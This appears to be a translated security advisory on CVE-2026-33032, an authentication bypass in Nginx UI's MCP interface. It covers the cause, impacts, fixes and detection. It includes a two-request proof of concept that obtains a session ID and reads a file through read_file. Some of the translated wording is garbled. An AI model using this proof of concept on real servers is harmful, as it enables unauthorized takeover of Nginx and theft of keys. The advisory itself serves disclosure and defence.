1. Description of the vulnerability
Nginx UI is a widely used open source Nginx graphical management tool. In its integrated MCP (Model Context Protocol) A serious authentication bypass vulnerability due to an oversight in code implementation exists in the interface, codenamed MCPwnNo. CVE-2026-33032.
The core cause of this vulnerability is a logical error in route registration:/mcp endpoints are affected by AuthRequired() middleware protection, but its paired, used to receive the actual tool call instruction /mcp_message Endpoints at deploymentThis authentication middleware is missing. This allows any attacker with network access to this UI to take over the Nginx service without any credentials.
2. Impact of vulnerabilities
•CVE Number: CVE-2026-33032
•nicknames: MCPwn
•CVSS 3.1 Rating:9.8 (Critical) (Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
•Vulnerability Type: Authentication Bypass (CWE-306)
•Affected versions:nginx-ui < 2.3.4
•restoration version: nginx-ui ≥ 2.3.4
•Technical implications:
•Arbitrary configuration changes: By edit_config The tool rewrites the server block to insert an upstream server controlled by the attacker.
•service takeover: By reload_nginx Malicious configuration with immediate effect, or by stop_nginx Causes a denial of service (DoS).
•leakage of sensitive information: Utilization read_file tool reads sensitive files such as TLS private keys, system credentials, and so on.
•Persistence control: Attackers can utilize create_cert Reissue controlled certificates, or combine them with other vulnerabilities to achieve long-term lurking.
3. POC (Proof of Concept)
The attack chain is extremely simple, requiring only two HTTP requests to complete the takeover:
Step 1: Get the Session ID
An attacker initiates a request to an unrestricted SSE stream endpoint to obtain the session identifier needed to execute subsequent commands.
GET /mcp HTTP/1.1 Host: :9000
Expected response: Returns the number of cells that contain the sessionID=XYZ The data flow .
Step 2: Execute the elevated privilege tool command
Utilization of acquired sessionID 向 /mcp_message Send JSON-RPC calls, e.g. to read sensitive files:
POST /mcp_message?sessionID=XYZ
HTTP/1.1
Host: :9000
Content-Type: application/json
{ "jsonrpc": "2.0", "method": "read_file", "params": { "path":"/etc/nginx/nginx.conf" }, "id": 1 }
Vulnerability Exploitation Chain (Chain )
This vulnerability is often associated with CVE-2026-27944(Unauthorized Backup Download Vulnerability) used in combination. The latter can compromise node_secretEven after fixing the 33032 vulnerability, an attacker could still maintain access to the MCP interface if the key is not rotated in a timely manner.
4. Rehabilitation proposals or programs
4.1 Core Repair
•Upgrade Now: Upgrade nginx-ui to 2.3.4 or higher. The official patch has been patched in the routing registration AuthRequired() Call.
// Fixed code snippet
r.POST("/mcp_message", AuthRequired(), mcpMessageHandler)
4.2 Mitigation and Reinforcement
•port isolation: Never expose the nginx-ui management port (default 9000) directly to the public network; use a VPN, bastion, or firewall (whitelisting policy) for access control.
•disable function: If AI-assisted management is not required, the MCP module can be completely disabled in the configuration file.
•Key Rotation: Be sure to rotate when upgraded node_secretThe SSL key and all sensitive credentials stored in the panel.
4.3 Means of detection
•automated testing: Available keraattin/CVE-2026-33032 Non-destructive inspection by supplied Python scripts or the Nmap NSE plugin.
5. Reference citations
Original article by Chief Security Officer, if reproduced, please credit https://www.cncso.com/en/nginx-ui-mcp-authentication-bypass.html
